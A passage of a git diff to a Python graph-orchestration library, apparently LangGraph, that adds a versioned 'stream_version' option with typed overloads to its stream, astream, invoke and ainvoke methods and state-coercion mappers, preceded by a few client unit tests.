def test_request_push_token(client):
result = client.request_push_token("dep-123")
assert result == {"ok": True}
def test_update_deployment(client):
result = client.update_deployment(
"dep-123", "image:latest", secrets=[{"name": "KEY", "value": "val"}]
)
assert result == {"ok": True}
def test_update_deployment_no_secrets(client):
result = client.update_deployment("dep-123", "image:latest")
assert result == {"ok": True}
def test_list_revisions(client):
result = client.list_revisions("dep-123", limit=5)
assert result == {"ok": True}
def test_get_revision(client):
result = client.get_revision("dep-123", "rev-456")
assert result == {"ok": True}
+378 -452
View File
File diff suppressed because it is too large Load Diff
+25 -4
View File
@@ -6,6 +6,7 @@ import typing
import warnings
from collections import defaultdict
from collections.abc import Awaitable, Callable, Hashable, Sequence
from dataclasses import is_dataclass
from functools import partial
from inspect import isclass, isfunction, ismethod, signature
from types import FunctionType
@@ -14,6 +15,7 @@ from typing import (
Any,
Generic,
Literal,
TypeVar,
Union,
cast,
get_args,
@@ -1164,6 +1166,20 @@ class StateGraph(Generic[StateT, ContextT, InputT, OutputT]):
for key, node in self.nodes.items():
compiled.attach_node(key, node)
# Record output/state mappers for v2 stream coercion (pydantic/dataclass only)
compiled._output_mapper = _pick_mapper(
list(output_channels)
if isinstance(output_channels, list)
else [output_channels],
self.output_schema,
)
compiled._state_mapper = _pick_mapper(
list(stream_channels)
if isinstance(stream_channels, list)
else [stream_channels],
self.state_schema,
)
for start, end in self.edges:
compiled.attach_edge(start, end)
@@ -1183,6 +1199,8 @@ class CompiledStateGraph(
):
builder: StateGraph[StateT, ContextT, InputT, OutputT]
schema_to_mapper: dict[type[Any], Callable[[Any], Any] | None]
_output_mapper: Callable[[Any], Any] | None
_state_mapper: Callable[[Any], Any] | None
def __init__(
self,
@@ -1504,12 +1522,15 @@ def _pick_mapper(
) -> Callable[[Any], Any] | None:
if state_keys == ["__root__"]:
return None
if isclass(schema) and issubclass(schema, dict):
return None
return partial(_coerce_state, schema)
if isclass(schema) and (issubclass(schema, BaseModel) or is_dataclass(schema)):
return partial(_coerce_state, schema)
return None
def _coerce_state(schema: type[Any], input: dict[str, Any]) -> dict[str, Any]:
_S = TypeVar("_S")
def _coerce_state(schema: type[_S], input: dict[str, Any]) -> _S:
return schema(**input)
+8 -37
View File
@@ -7,7 +7,6 @@ from uuid import UUID
from langchain_core.runnables import RunnableConfig
from langgraph.checkpoint.base import CheckpointMetadata, PendingWrite
from typing_extensions import TypedDict
from langgraph._internal._config import patch_checkpoint_map
from langgraph._internal._constants import (
@@ -23,42 +22,14 @@ from langgraph._internal._typing import MISSING
from langgraph.channels.base import BaseChannel
from langgraph.constants import TAG_HIDDEN
from langgraph.pregel._io import read_channels
from langgraph.types import PregelExecutableTask, PregelTask, StateSnapshot
__all__ = ("TaskPayload", "TaskResultPayload", "CheckpointTask", "CheckpointPayload")
class TaskPayload(TypedDict):
id: str
name: str
input: Any
triggers: list[str]
class TaskResultPayload(TypedDict):
id: str
name: str
error: str | None
interrupts: list[dict]
result: dict[str, Any]
class CheckpointTask(TypedDict):
id: str
name: str
error: str | None
interrupts: list[dict]
state: StateSnapshot | RunnableConfig | None
class CheckpointPayload(TypedDict):
config: RunnableConfig | None
metadata: CheckpointMetadata
values: dict[str, Any]
next: list[str]
parent_config: RunnableConfig | None
tasks: list[CheckpointTask]
from langgraph.types import (
CheckpointPayload,
PregelExecutableTask,
PregelTask,
StateSnapshot,
TaskPayload,
TaskResultPayload,
)
TASK_NAMESPACE = UUID("6ba7b831-9dad-11d1-80b4-00c04fd430c8")
+386 -64
View File
@@ -22,8 +22,10 @@ from inspect import isclass
from typing import (
Any,
Generic,
Literal,
cast,
get_type_hints,
overload,
)
from uuid import UUID, uuid5
@@ -121,7 +123,10 @@ from langgraph.pregel._checkpoint import (
)
from langgraph.pregel._draw import draw_graph
from langgraph.pregel._io import map_input, read_channels
from langgraph.pregel._loop import AsyncPregelLoop, SyncPregelLoop
from langgraph.pregel._loop import (
AsyncPregelLoop,
SyncPregelLoop,
)
from langgraph.pregel._messages import StreamMessagesHandler
from langgraph.pregel._read import DEFAULT_BOUND, PregelNode
from langgraph.pregel._retry import RetryPolicy
@@ -138,11 +143,13 @@ from langgraph.types import (
Checkpointer,
Command,
Durability,
GraphOutput,
Interrupt,
Send,
StateSnapshot,
StateUpdate,
StreamMode,
StreamPart,
ensure_valid_checkpointer,
)
from langgraph.typing import ContextT, InputT, OutputT, StateT
@@ -993,6 +1000,11 @@ class Pregel(
for name, node in self.get_subgraphs(namespace=namespace, recurse=recurse):
yield name, node
# Mappers for v2 stream coercion (pydantic/dataclass).
# Set by CompiledStateGraph; None for base Pregel.
_output_mapper: Callable[[Any], Any] | None = None
_state_mapper: Callable[[Any], Any] | None = None
def _migrate_checkpoint(self, checkpoint: Checkpoint) -> None:
"""Migrate a saved checkpoint to new channel layout."""
if checkpoint["v"] < 4 and checkpoint.get("pending_sends"):
@@ -2427,6 +2439,7 @@ class Pregel(
durability,
)
@overload
def stream(
self,
input: InputT | Command | None,
@@ -2441,6 +2454,44 @@ class Pregel(
durability: Durability | None = None,
subgraphs: bool = False,
debug: bool | None = None,
stream_version: Literal["v1"],
**kwargs: Unpack[DeprecatedKwargs],
) -> Iterator[dict[str, Any] | Any]: ...
@overload
def stream(
self,
input: InputT | Command | None,
config: RunnableConfig | None = None,
*,
context: ContextT | None = None,
stream_mode: StreamMode | Sequence[StreamMode] | None = None,
print_mode: StreamMode | Sequence[StreamMode] = (),
output_keys: str | Sequence[str] | None = None,
interrupt_before: All | Sequence[str] | None = None,
interrupt_after: All | Sequence[str] | None = None,
durability: Durability | None = None,
subgraphs: bool = False,
debug: bool | None = None,
stream_version: Literal["v2"] = ...,
**kwargs: Unpack[DeprecatedKwargs],
) -> Iterator[StreamPart[OutputT, StateT]]: ...
def stream(
self,
input: InputT | Command | None,
config: RunnableConfig | None = None,
*,
context: ContextT | None = None,
stream_mode: StreamMode | Sequence[StreamMode] | None = None,
print_mode: StreamMode | Sequence[StreamMode] = (),
output_keys: str | Sequence[str] | None = None,
interrupt_before: All | Sequence[str] | None = None,
interrupt_after: All | Sequence[str] | None = None,
durability: Durability | None = None,
subgraphs: bool = False,
debug: bool | None = None,
stream_version: Literal["v1", "v2"] = "v2",
**kwargs: Unpack[DeprecatedKwargs],
) -> Iterator[dict[str, Any] | Any]:
"""Stream graph steps for a single input.
@@ -2602,6 +2653,10 @@ class Pregel(
runtime = parent_runtime.merge(runtime)
config[CONF][CONFIG_KEY_RUNTIME] = runtime
# resolve mappers for v2 stream coercion
_output_mapper = self._output_mapper if stream_version == "v2" else None
_state_mapper = self._state_mapper if stream_version == "v2" else None
with SyncPregelLoop(
input,
stream=StreamProtocol(stream.put, stream_modes),
@@ -2674,7 +2729,14 @@ class Pregel(
):
# emit output
yield from _output(
stream_mode, print_mode, subgraphs, stream.get, queue.Empty
stream_mode,
print_mode,
subgraphs,
stream.get,
queue.Empty,
stream_version,
_output_mapper,
_state_mapper,
)
loop.after_tick()
# wait for checkpoint
@@ -2682,7 +2744,14 @@ class Pregel(
loop._put_checkpoint_fut.result()
# emit output
yield from _output(
stream_mode, print_mode, subgraphs, stream.get, queue.Empty
stream_mode,
print_mode,
subgraphs,
stream.get,
queue.Empty,
stream_version,
_output_mapper,
_state_mapper,
)
# handle exit
if loop.status == "out_of_steps":
@@ -2701,6 +2770,44 @@ class Pregel(
run_manager.on_chain_error(e)
raise
@overload
def astream(
self,
input: InputT | Command | None,
config: RunnableConfig | None = None,
*,
context: ContextT | None = None,
stream_mode: StreamMode | Sequence[StreamMode] | None = None,
print_mode: StreamMode | Sequence[StreamMode] = (),
output_keys: str | Sequence[str] | None = None,
interrupt_before: All | Sequence[str] | None = None,
interrupt_after: All | Sequence[str] | None = None,
durability: Durability | None = None,
subgraphs: bool = False,
debug: bool | None = None,
stream_version: Literal["v1"],
**kwargs: Unpack[DeprecatedKwargs],
) -> AsyncIterator[dict[str, Any] | Any]: ...
@overload
def astream(
self,
input: InputT | Command | None,
config: RunnableConfig | None = None,
*,
context: ContextT | None = None,
stream_mode: StreamMode | Sequence[StreamMode] | None = None,
print_mode: StreamMode | Sequence[StreamMode] = (),
output_keys: str | Sequence[str] | None = None,
interrupt_before: All | Sequence[str] | None = None,
interrupt_after: All | Sequence[str] | None = None,
durability: Durability | None = None,
subgraphs: bool = False,
debug: bool | None = None,
stream_version: Literal["v2"] = ...,
**kwargs: Unpack[DeprecatedKwargs],
) -> AsyncIterator[StreamPart[OutputT, StateT]]: ...
async def astream(
self,
input: InputT | Command | None,
@@ -2715,6 +2822,7 @@ class Pregel(
durability: Durability | None = None,
subgraphs: bool = False,
debug: bool | None = None,
stream_version: Literal["v1", "v2"] = "v2",
**kwargs: Unpack[DeprecatedKwargs],
) -> AsyncIterator[dict[str, Any] | Any]:
"""Asynchronously stream graph steps for a single input.
@@ -2911,6 +3019,10 @@ class Pregel(
runtime = parent_runtime.merge(runtime)
config[CONF][CONFIG_KEY_RUNTIME] = runtime
# resolve mappers for v2 stream coercion
_output_mapper = self._output_mapper if stream_version == "v2" else None
_state_mapper = self._state_mapper if stream_version == "v2" else None
async with AsyncPregelLoop(
input,
stream=StreamProtocol(stream.put_nowait, stream_modes),
@@ -3007,6 +3119,9 @@ class Pregel(
subgraphs,
stream.get_nowait,
asyncio.QueueEmpty,
stream_version,
_output_mapper,
_state_mapper,
):
yield o
loop.after_tick()
@@ -3025,6 +3140,9 @@ class Pregel(
subgraphs,
stream.get_nowait,
asyncio.QueueEmpty,
stream_version,
_output_mapper,
_state_mapper,
):
yield o
# handle exit
@@ -3044,6 +3162,7 @@ class Pregel(
await asyncio.shield(run_manager.on_chain_error(e))
raise
@overload
def invoke(
self,
input: InputT | Command | None,
@@ -3056,6 +3175,57 @@ class Pregel(
interrupt_before: All | Sequence[str] | None = None,
interrupt_after: All | Sequence[str] | None = None,
durability: Durability | None = None,
stream_version: Literal["v1"],
**kwargs: Any,
) -> dict[str, Any] | Any: ...
@overload
def invoke(
self,
input: InputT | Command | None,
config: RunnableConfig | None = None,
*,
context: ContextT | None = None,
stream_mode: Literal["values"] = ...,
print_mode: StreamMode | Sequence[StreamMode] = (),
output_keys: str | Sequence[str] | None = None,
interrupt_before: All | Sequence[str] | None = None,
interrupt_after: All | Sequence[str] | None = None,
durability: Durability | None = None,
stream_version: Literal["v2"] = ...,
**kwargs: Any,
) -> GraphOutput[OutputT]: ...
@overload
def invoke(
self,
input: InputT | Command | None,
config: RunnableConfig | None = None,
*,
context: ContextT | None = None,
stream_mode: StreamMode,
print_mode: StreamMode | Sequence[StreamMode] = (),
output_keys: str | Sequence[str] | None = None,
interrupt_before: All | Sequence[str] | None = None,
interrupt_after: All | Sequence[str] | None = None,
durability: Durability | None = None,
stream_version: Literal["v2"] = ...,
**kwargs: Any,
) -> list[StreamPart[OutputT, StateT]]: ...
def invoke(
self,
input: InputT | Command | None,
config: RunnableConfig | None = None,
*,
context: ContextT | None = None,
stream_mode: StreamMode = "values",
print_mode: StreamMode | Sequence[StreamMode] = (),
output_keys: str | Sequence[str] | None = None,
interrupt_before: All | Sequence[str] | None = None,
interrupt_after: All | Sequence[str] | None = None,
durability: Durability | None = None,
stream_version: Literal["v1", "v2"] = "v2",
**kwargs: Any,
) -> dict[str, Any] | Any:
"""Run the graph with a single input and config.
@@ -3079,6 +3249,9 @@ class Pregel(
- `"sync"`: Changes are persisted synchronously before the next step starts.
- `"async"`: Changes are persisted asynchronously while the next step executes.
- `"exit"`: Changes are persisted only when the graph exits.
stream_version: The streaming format version. `"v1"` (default) returns the
traditional format, `"v2"` returns `StreamPart` typed dicts when
`stream_mode` is not `"values"`.
**kwargs: Additional keyword arguments to pass to the graph run.
Returns:
@@ -3091,39 +3264,64 @@ class Pregel(
chunks: list[dict[str, Any] | Any] = []
interrupts: list[Interrupt] = []
for chunk in self.stream(
input,
config,
context=context,
stream_mode=["updates", "values"]
if stream_mode == "values"
else stream_mode,
print_mode=print_mode,
output_keys=output_keys,
interrupt_before=interrupt_before,
interrupt_after=interrupt_after,
durability=durability,
**kwargs,
):
if stream_mode == "values":
if len(chunk) == 2:
mode, payload = cast(tuple[StreamMode, Any], chunk)
if stream_version == "v2":
# v2: values stream parts carry interrupts directly
for chunk in self.stream(
input,
config,
context=context,
stream_mode="values" if stream_mode == "values" else stream_mode,
print_mode=print_mode,
output_keys=output_keys,
interrupt_before=interrupt_before,
interrupt_after=interrupt_after,
durability=durability,
stream_version=stream_version,
**kwargs,
):
if stream_mode == "values":
latest = chunk["data"]
if chunk_ints := chunk.get("interrupts", ()):
interrupts.extend(chunk_ints) # type: ignore[arg-type]
else:
_, mode, payload = cast(
tuple[tuple[str, ...], StreamMode, Any], chunk
)
if (
mode == "updates"
and isinstance(payload, dict)
and (ints := payload.get(INTERRUPT)) is not None
):
interrupts.extend(ints)
elif mode == "values":
latest = payload
else:
chunks.append(chunk)
chunks.append(chunk)
else:
# v1: collect interrupts from updates stream
for chunk in self.stream(
input,
config,
context=context,
stream_mode=(
["updates", "values"] if stream_mode == "values" else stream_mode
),
print_mode=print_mode,
output_keys=output_keys,
interrupt_before=interrupt_before,
interrupt_after=interrupt_after,
durability=durability,
**kwargs,
):
if stream_mode == "values":
if len(chunk) == 2:
mode, payload = cast(tuple[StreamMode, Any], chunk)
else:
_, mode, payload = cast(
tuple[tuple[str, ...], StreamMode, Any], chunk
)
if (
mode == "updates"
and isinstance(payload, dict)
and (ints := payload.get(INTERRUPT)) is not None
):
interrupts.extend(ints)
elif mode == "values":
latest = payload
else:
chunks.append(chunk)
if stream_mode == "values":
if stream_version == "v2":
return GraphOutput(value=latest, interrupts=tuple(interrupts))
if interrupts:
return (
{**latest, INTERRUPT: interrupts}
@@ -3134,6 +3332,57 @@ class Pregel(
else:
return chunks
@overload
async def ainvoke(
self,
input: InputT | Command | None,
config: RunnableConfig | None = None,
*,
context: ContextT | None = None,
stream_mode: StreamMode = "values",
print_mode: StreamMode | Sequence[StreamMode] = (),
output_keys: str | Sequence[str] | None = None,
interrupt_before: All | Sequence[str] | None = None,
interrupt_after: All | Sequence[str] | None = None,
durability: Durability | None = None,
stream_version: Literal["v1"],
**kwargs: Any,
) -> dict[str, Any] | Any: ...
@overload
async def ainvoke(
self,
input: InputT | Command | None,
config: RunnableConfig | None = None,
*,
context: ContextT | None = None,
stream_mode: Literal["values"] = ...,
print_mode: StreamMode | Sequence[StreamMode] = (),
output_keys: str | Sequence[str] | None = None,
interrupt_before: All | Sequence[str] | None = None,
interrupt_after: All | Sequence[str] | None = None,
durability: Durability | None = None,
stream_version: Literal["v2"] = ...,
**kwargs: Any,
) -> GraphOutput[OutputT]: ...
@overload
async def ainvoke(
self,
input: InputT | Command | None,
config: RunnableConfig | None = None,
*,
context: ContextT | None = None,
stream_mode: StreamMode,
print_mode: StreamMode | Sequence[StreamMode] = (),
output_keys: str | Sequence[str] | None = None,
interrupt_before: All | Sequence[str] | None = None,
interrupt_after: All | Sequence[str] | None = None,
durability: Durability | None = None,
stream_version: Literal["v2"] = ...,
**kwargs: Any,
) -> list[StreamPart[OutputT, StateT]]: ...
async def ainvoke(
self,
input: InputT | Command | None,
@@ -3146,6 +3395,7 @@ class Pregel(
interrupt_before: All | Sequence[str] | None = None,
interrupt_after: All | Sequence[str] | None = None,
durability: Durability | None = None,
stream_version: Literal["v1", "v2"] = "v2",
**kwargs: Any,
) -> dict[str, Any] | Any:
"""Asynchronously run the graph with a single input and config.
@@ -3169,6 +3419,9 @@ class Pregel(
- `"sync"`: Changes are persisted synchronously before the next step starts.
- `"async"`: Changes are persisted asynchronously while the next step executes.
- `"exit"`: Changes are persisted only when the graph exits.
stream_version: The streaming format version. `"v1"` (default) returns the
traditional format, `"v2"` returns `StreamPart` typed dicts when
`stream_mode` is not `"values"`.
**kwargs: Additional keyword arguments to pass to the graph run.
Returns:
@@ -3181,39 +3434,64 @@ class Pregel(
chunks: list[dict[str, Any] | Any] = []
interrupts: list[Interrupt] = []
async for chunk in self.astream(
input,
config,
context=context,
stream_mode=["updates", "values"]
if stream_mode == "values"
else stream_mode,
print_mode=print_mode,
output_keys=output_keys,
interrupt_before=interrupt_before,
interrupt_after=interrupt_after,
durability=durability,
**kwargs,
):
if stream_mode == "values":
if len(chunk) == 2:
mode, payload = cast(tuple[StreamMode, Any], chunk)
if stream_version == "v2":
# v2: values stream parts carry interrupts directly
async for chunk in self.astream(
input,
config,
context=context,
stream_mode="values" if stream_mode == "values" else stream_mode,
print_mode=print_mode,
output_keys=output_keys,
interrupt_before=interrupt_before,
interrupt_after=interrupt_after,
durability=durability,
stream_version=stream_version,
**kwargs,
):
if stream_mode == "values":
latest = chunk["data"]
if chunk_ints := chunk.get("interrupts", ()):
interrupts.extend(chunk_ints) # type: ignore[arg-type]
else:
_, mode, payload = cast(
tuple[tuple[str, ...], StreamMode, Any], chunk
)
if (
mode == "updates"
and isinstance(payload, dict)
and (ints := payload.get(INTERRUPT)) is not None
):
interrupts.extend(ints)
elif mode == "values":
latest = payload
else:
chunks.append(chunk)
chunks.append(chunk)
else:
# v1: collect interrupts from updates stream
async for chunk in self.astream(
input,
config,
context=context,
stream_mode=(
["updates", "values"] if stream_mode == "values" else stream_mode
),
print_mode=print_mode,
output_keys=output_keys,
interrupt_before=interrupt_before,
interrupt_after=interrupt_after,
durability=durability,
**kwargs,
):
if stream_mode == "values":
if len(chunk) == 2:
mode, payload = cast(tuple[StreamMode, Any], chunk)
else:
_, mode, payload = cast(
tuple[tuple[str, ...], StreamMode, Any], chunk
)
if (
mode == "updates"
and isinstance(payload, dict)
and (ints := payload.get(INTERRUPT)) is not None
):
interrupts.extend(ints)
elif mode == "values":
latest = payload
else:
chunks.append(chunk)
if stream_mode == "values":
if stream_version == "v2":
return GraphOutput(value=latest, interrupts=tuple(interrupts))
if interrupts:
return (
{**latest, INTERRUPT: interrupts}
@@ -3278,6 +3556,9 @@ def _output(
stream_subgraphs: bool,
getter: Callable[[], tuple[tuple[str, ...], str, Any]],
empty_exc: type[Exception],
stream_version: Literal["v1", "v2"] = "v2",
output_mapper: Callable[[Any], Any] | None = None,
state_mapper: Callable[[Any], Any] | None = None,
) -> Iterator:
while True:
try:
@@ -3305,7 +3586,23 @@ def _output(
)
)
if mode in stream_mode:
if stream_subgraphs and isinstance(stream_mode, list):
if stream_version == "v2":
if mode == "values":
# pop __interrupt__ into typed field, coerce data
ints: tuple[Interrupt, ...] = ()
if isinstance(payload, dict):
ints = payload.pop(INTERRUPT, ())
if output_mapper:
payload = output_mapper(payload)
yield {"type": mode, "ns": ns, "data": payload, "interrupts": ints}
elif mode in ("checkpoints", "debug"):
# coerce state values in checkpoint/debug payloads
if state_mapper:
_coerce_checkpoint_values(payload, state_mapper)
yield {"type": mode, "ns": ns, "data": payload}
else:
yield {"type": mode, "ns": ns, "data": payload}
elif stream_subgraphs and isinstance(stream_mode, list):
yield (ns, mode, payload)
elif isinstance(stream_mode, list):
yield (mode, payload)
@@ -3315,6 +3612,31 @@ def _output(
yield payload
def _coerce_checkpoint_values(payload: Any, mapper: Callable[[Any], Any]) -> None:
"""Coerce `values` dicts inside checkpoint or debug payloads in-place.
Skips the initial checkpoint (where next contains ``__start__``) because
not all channels are populated yet and coercion would fail.
"""
_START = "__start__"
# debug wrapper: {"type": "checkpoint", "payload": {"values": dict, ...}}
if (
isinstance(payload, dict)
and payload.get("type") == "checkpoint"
and isinstance(payload.get("payload"), dict)
and isinstance(payload["payload"].get("values"), dict)
and _START not in payload["payload"].get("next", ())
):
payload["payload"]["values"] = mapper(payload["payload"]["values"])
# direct checkpoint payload: {"values": dict, ...}
elif (
isinstance(payload, dict)
and isinstance(payload.get("values"), dict)
and _START not in payload.get("next", ())
):
payload["values"] = mapper(payload["values"])
def _coerce_context(
context_schema: type[ContextT] | None, context: Any
) -> ContextT | None:
+128 -4
View File
@@ -2,13 +2,21 @@ from __future__ import annotations
from abc import abstractmethod
from collections.abc import AsyncIterator, Callable, Iterator, Sequence
from typing import Any, Generic, cast
from typing import Any, Generic, Literal, cast, overload
from langchain_core.runnables import Runnable, RunnableConfig
from langchain_core.runnables.graph import Graph as DrawableGraph
from typing_extensions import Self
from langgraph.types import All, Command, StateSnapshot, StateUpdate, StreamMode
from langgraph.types import (
All,
Command,
GraphOutput,
StateSnapshot,
StateUpdate,
StreamMode,
StreamPart,
)
from langgraph.typing import ContextT, InputT, OutputT, StateT
__all__ = ("PregelProtocol", "StreamProtocol")
@@ -96,6 +104,7 @@ class PregelProtocol(Runnable[InputT, Any], Generic[StateT, ContextT, InputT, Ou
as_node: str | None = None,
) -> RunnableConfig: ...
@overload
@abstractmethod
def stream(
self,
@@ -107,8 +116,68 @@ class PregelProtocol(Runnable[InputT, Any], Generic[StateT, ContextT, InputT, Ou
interrupt_before: All | Sequence[str] | None = None,
interrupt_after: All | Sequence[str] | None = None,
subgraphs: bool = False,
stream_version: Literal["v1"],
) -> Iterator[dict[str, Any] | Any]: ...
@overload
@abstractmethod
def stream(
self,
input: InputT | Command | None,
config: RunnableConfig | None = None,
*,
context: ContextT | None = None,
stream_mode: StreamMode | list[StreamMode] | None = None,
interrupt_before: All | Sequence[str] | None = None,
interrupt_after: All | Sequence[str] | None = None,
subgraphs: bool = False,
stream_version: Literal["v2"] = ...,
) -> Iterator[StreamPart[OutputT, StateT]]: ...
@abstractmethod
def stream(
self,
input: InputT | Command | None,
config: RunnableConfig | None = None,
*,
context: ContextT | None = None,
stream_mode: StreamMode | list[StreamMode] | None = None,
interrupt_before: All | Sequence[str] | None = None,
interrupt_after: All | Sequence[str] | None = None,
subgraphs: bool = False,
stream_version: Literal["v1", "v2"] = "v2",
) -> Iterator[StreamPart[OutputT, StateT]]: ...
@overload
@abstractmethod
def astream(
self,
input: InputT | Command | None,
config: RunnableConfig | None = None,
*,
context: ContextT | None = None,
stream_mode: StreamMode | list[StreamMode] | None = None,
interrupt_before: All | Sequence[str] | None = None,
interrupt_after: All | Sequence[str] | None = None,
subgraphs: bool = False,
stream_version: Literal["v1"],
) -> AsyncIterator[dict[str, Any] | Any]: ...
@overload
@abstractmethod
def astream(
self,
input: InputT | Command | None,
config: RunnableConfig | None = None,
*,
context: ContextT | None = None,
stream_mode: StreamMode | list[StreamMode] | None = None,
interrupt_before: All | Sequence[str] | None = None,
interrupt_after: All | Sequence[str] | None = None,
subgraphs: bool = False,
stream_version: Literal["v2"] = ...,
) -> AsyncIterator[StreamPart[OutputT, StateT]]: ...
@abstractmethod
def astream(
self,
@@ -120,7 +189,34 @@ class PregelProtocol(Runnable[InputT, Any], Generic[StateT, ContextT, InputT, Ou
interrupt_before: All | Sequence[str] | None = None,
interrupt_after: All | Sequence[str] | None = None,
subgraphs: bool = False,
) -> AsyncIterator[dict[str, Any] | Any]: ...
stream_version: Literal["v1", "v2"] = "v2",
) -> AsyncIterator[StreamPart[OutputT, StateT]]: ...
@overload
@abstractmethod
def invoke(
self,
input: InputT | Command | None,
config: RunnableConfig | None = None,
*,
context: ContextT | None = None,
interrupt_before: All | Sequence[str] | None = None,
interrupt_after: All | Sequence[str] | None = None,
stream_version: Literal["v1"],
) -> dict[str, Any] | Any: ...
@overload
@abstractmethod
def invoke(
self,
input: InputT | Command | None,
config: RunnableConfig | None = None,
*,
context: ContextT | None = None,
interrupt_before: All | Sequence[str] | None = None,
interrupt_after: All | Sequence[str] | None = None,
stream_version: Literal["v2"] = ...,
) -> GraphOutput[OutputT]: ...
@abstractmethod
def invoke(
@@ -131,8 +227,35 @@ class PregelProtocol(Runnable[InputT, Any], Generic[StateT, ContextT, InputT, Ou
context: ContextT | None = None,
interrupt_before: All | Sequence[str] | None = None,
interrupt_after: All | Sequence[str] | None = None,
stream_version: Literal["v1", "v2"] = "v2",
) -> GraphOutput[OutputT]: ...
@overload
@abstractmethod
async def ainvoke(
self,
input: InputT | Command | None,
config: RunnableConfig | None = None,
*,
context: ContextT | None = None,
interrupt_before: All | Sequence[str] | None = None,
interrupt_after: All | Sequence[str] | None = None,
stream_version: Literal["v1"],
) -> dict[str, Any] | Any: ...
@overload
@abstractmethod
async def ainvoke(
self,
input: InputT | Command | None,
config: RunnableConfig | None = None,
*,
context: ContextT | None = None,
interrupt_before: All | Sequence[str] | None = None,
interrupt_after: All | Sequence[str] | None = None,
stream_version: Literal["v2"] = ...,
) -> GraphOutput[OutputT]: ...
@abstractmethod
async def ainvoke(
self,
@@ -142,7 +265,8 @@ class PregelProtocol(Runnable[InputT, Any], Generic[StateT, ContextT, InputT, Ou
context: ContextT | None = None,
interrupt_before: All | Sequence[str] | None = None,
interrupt_after: All | Sequence[str] | None = None,
) -> dict[str, Any] | Any: ...
stream_version: Literal["v1", "v2"] = "v2",
) -> GraphOutput[OutputT]: ...
StreamChunk = tuple[tuple[str, ...], str, Any]
+153 -6
View File
@@ -7,6 +7,7 @@ from typing import (
Any,
Literal,
cast,
overload,
)
from uuid import UUID
@@ -57,10 +58,12 @@ from langgraph.pregel.protocol import PregelProtocol, StreamProtocol
from langgraph.types import (
All,
Command,
GraphOutput,
Interrupt,
PregelTask,
StateSnapshot,
StreamMode,
StreamPart,
)
logger = logging.getLogger(__name__)
@@ -682,6 +685,7 @@ class RemoteGraph(PregelProtocol):
updated_stream_modes.remove("events")
return (updated_stream_modes, requested_stream_modes, req_single, stream)
@overload
def stream(
self,
input: dict[str, Any] | Any,
@@ -693,6 +697,38 @@ class RemoteGraph(PregelProtocol):
subgraphs: bool = False,
headers: dict[str, str] | None = None,
params: QueryParamTypes | None = None,
stream_version: Literal["v1"],
**kwargs: Any,
) -> Iterator[dict[str, Any] | Any]: ...
@overload
def stream(
self,
input: dict[str, Any] | Any,
config: RunnableConfig | None = None,
*,
stream_mode: StreamMode | list[StreamMode] | None = None,
interrupt_before: All | Sequence[str] | None = None,
interrupt_after: All | Sequence[str] | None = None,
subgraphs: bool = False,
headers: dict[str, str] | None = None,
params: QueryParamTypes | None = None,
stream_version: Literal["v2"] = ...,
**kwargs: Any,
) -> Iterator[StreamPart]: ...
def stream(
self,
input: dict[str, Any] | Any,
config: RunnableConfig | None = None,
*,
stream_mode: StreamMode | list[StreamMode] | None = None,
interrupt_before: All | Sequence[str] | None = None,
interrupt_after: All | Sequence[str] | None = None,
subgraphs: bool = False,
headers: dict[str, str] | None = None,
params: QueryParamTypes | None = None,
stream_version: Literal["v1", "v2"] = "v2",
**kwargs: Any,
) -> Iterator[dict[str, Any] | Any]:
"""Create a run and stream the results.
@@ -774,10 +810,12 @@ class RemoteGraph(PregelProtocol):
continue
if chunk.event.startswith("messages"):
chunk = chunk._replace(data=tuple(chunk.data)) # type: ignore
chunk = chunk._replace(data=tuple(chunk.data))
# emit chunk
if subgraphs:
if stream_version == "v2":
yield {"type": mode, "ns": ns, "data": chunk.data}
elif subgraphs:
if NS_SEP in chunk.event:
mode, ns_ = chunk.event.split(NS_SEP, 1)
ns = tuple(ns_.split(NS_SEP))
@@ -792,6 +830,38 @@ class RemoteGraph(PregelProtocol):
else:
yield chunk
@overload
def astream(
self,
input: dict[str, Any] | Any,
config: RunnableConfig | None = None,
*,
stream_mode: StreamMode | list[StreamMode] | None = None,
interrupt_before: All | Sequence[str] | None = None,
interrupt_after: All | Sequence[str] | None = None,
subgraphs: bool = False,
headers: dict[str, str] | None = None,
params: QueryParamTypes | None = None,
stream_version: Literal["v1"],
**kwargs: Any,
) -> AsyncIterator[dict[str, Any] | Any]: ...
@overload
def astream(
self,
input: dict[str, Any] | Any,
config: RunnableConfig | None = None,
*,
stream_mode: StreamMode | list[StreamMode] | None = None,
interrupt_before: All | Sequence[str] | None = None,
interrupt_after: All | Sequence[str] | None = None,
subgraphs: bool = False,
headers: dict[str, str] | None = None,
params: QueryParamTypes | None = None,
stream_version: Literal["v2"] = ...,
**kwargs: Any,
) -> AsyncIterator[StreamPart]: ...
async def astream(
self,
input: dict[str, Any] | Any,
@@ -803,6 +873,7 @@ class RemoteGraph(PregelProtocol):
subgraphs: bool = False,
headers: dict[str, str] | None = None,
params: QueryParamTypes | None = None,
stream_version: Literal["v1", "v2"] = "v2",
**kwargs: Any,
) -> AsyncIterator[dict[str, Any] | Any]:
"""Create a run and stream the results.
@@ -884,10 +955,12 @@ class RemoteGraph(PregelProtocol):
continue
if chunk.event.startswith("messages"):
chunk = chunk._replace(data=tuple(chunk.data)) # type: ignore
chunk = chunk._replace(data=tuple(chunk.data))
# emit chunk
if subgraphs:
if stream_version == "v2":
yield {"type": mode, "ns": ns, "data": chunk.data}
elif subgraphs:
if NS_SEP in chunk.event:
mode, ns_ = chunk.event.split(NS_SEP, 1)
ns = tuple(ns_.split(NS_SEP))
@@ -918,6 +991,7 @@ class RemoteGraph(PregelProtocol):
) -> AsyncIterator[dict[str, Any]]:
raise NotImplementedError
@overload
def invoke(
self,
input: dict[str, Any] | Any,
@@ -927,6 +1001,34 @@ class RemoteGraph(PregelProtocol):
interrupt_after: All | Sequence[str] | None = None,
headers: dict[str, str] | None = None,
params: QueryParamTypes | None = None,
stream_version: Literal["v1"],
**kwargs: Any,
) -> dict[str, Any] | Any: ...
@overload
def invoke(
self,
input: dict[str, Any] | Any,
config: RunnableConfig | None = None,
*,
interrupt_before: All | Sequence[str] | None = None,
interrupt_after: All | Sequence[str] | None = None,
headers: dict[str, str] | None = None,
params: QueryParamTypes | None = None,
stream_version: Literal["v2"] = ...,
**kwargs: Any,
) -> GraphOutput[dict[str, Any]]: ...
def invoke(
self,
input: dict[str, Any] | Any,
config: RunnableConfig | None = None,
*,
interrupt_before: All | Sequence[str] | None = None,
interrupt_after: All | Sequence[str] | None = None,
headers: dict[str, str] | None = None,
params: QueryParamTypes | None = None,
stream_version: Literal["v1", "v2"] = "v2",
**kwargs: Any,
